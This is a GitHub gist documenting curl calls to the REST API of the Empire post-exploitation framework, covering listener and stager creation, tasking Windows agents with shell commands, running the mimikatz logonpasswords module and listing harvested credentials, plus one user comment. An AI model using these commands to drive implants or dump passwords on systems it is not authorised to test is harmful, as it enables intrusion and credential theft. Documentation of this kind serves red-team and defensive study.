Skip to content

Instantly share code, notes, and snippets.

@HarmJ0y
Last active March 20, 2020 20:14
Show Gist options
  • Save HarmJ0y/5b5aadbe694bc0be96c4 to your computer and use it in GitHub Desktop.
Save HarmJ0y/5b5aadbe694bc0be96c4 to your computer and use it in GitHub Desktop.
Empire RESTful API usage
# start empire headless with the specified API username and password
./empire --headless --username empireadmin --password 'Password123!'
# login and the current server token
curl --insecure -i -H "Content-Type: application/json" https://localhost:1337/api/admin/login -X POST -d '{"username":"empireadmin", "password":"Password123!"}'
# store the token in a variable
TOKEN=<API_token>
# see listener options
curl --insecure -i https://localhost:1337/api/listeners/options?token=$TOKEN
# create a listener
curl --insecure -i -H "Content-Type: application/json" https://localhost:1337/api/listeners?token=$TOKEN -X POST -d '{"Name":"testing"}'
# verify listener was created
curl --insecure -i https://localhost:1337/api/listeners?token=$TOKEN
# get the stager for this listener
curl --insecure -i -H "Content-Type: application/json" https://localhost:1337/api/stagers?token=$TOKEN -X POST -d '{"StagerName":"launcher", "Listener":"testing"}'
# execute stager on a Windows client
# see registered agents
curl --insecure -i https://localhost:1337/api/agents?token=$TOKEN
# grab the agent name and store it in a variable
AGENT=<sessionID>
# task the agent to run a shell command
curl --insecure -i -H "Content-Type: application/json" https://localhost:1337/api/agents/$AGENT/shell?token=$TOKEN -X POST -d '{"command":"whoami"}'
# task all agents to run a shell command
curl --insecure -i -H "Content-Type: application/json" https://localhost:1337/api/agents/all/shell?token=$TOKEN -X POST -d '{"command":"pwd"}'
# task the agent to run a module
curl --insecure -i -H "Content-Type: application/json" https://localhost:1337/api/modules/credentials/mimikatz/logonpasswords?token=$TOKEN -X POST -d "{\"Agent\":\"$AGENT\"}"
# clear all agent taskings
# curl --insecure -i -H "Content-Type: application/json" https://localhost:1337/api/agents/all/clear?token=$TOKEN
# get agent results
curl --insecure -i https://localhost:1337/api/agents/$AGENT/results?token=$TOKEN
# get all agent results
curl --insecure -i https://localhost:1337/api/agents/all/results?token=$TOKEN
# clear all agent result buffers
curl --insecure -i https://localhost:1337/api/agents/all/results?token=$TOKEN -X DELETE
# see stored credentials
curl --insecure -i https://localhost:1337/api/creds?token=$TOKEN
# rename the agent
curl --insecure -i -H "Content-Type: application/json" https://localhost:1337/api/agents/$AGENT/rename?token=$TOKEN -X POST -d '{"newname":"newagent"}'
# kill the agent
curl --insecure -i -H "Content-Type: application/json" https://localhost:1337/api/agents/newagent/kill?token=$TOKEN -X POST
# confirm kill
curl --insecure -i https://localhost:1337/api/agents?token=$TOKEN
# get any stale agents
curl --insecure -i https://localhost:1337/api/agents/stale?token=$TOKEN
# remove stale agents
curl --insecure -i https://localhost:1337/api/agents/stale?token=$TOKEN -X DELETE
# restart the server
curl --insecure -i https://localhost:1337/api/admin/restart?token=$TOKEN
# kill all listeners
curl --insecure -i https://localhost:1337/api/listeners/all?token=$TOKEN -X DELETE
# shut down the server
curl --insecure -i https://localhost:1337/api/admin/shutdown?token=$TOKEN
@rajiv2790
Copy link

rajiv2790 commented May 2, 2018

When I do a POST to create a listener, I am getting the error message "Method not allowed". I think you have missed the listener type in the POST URL.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment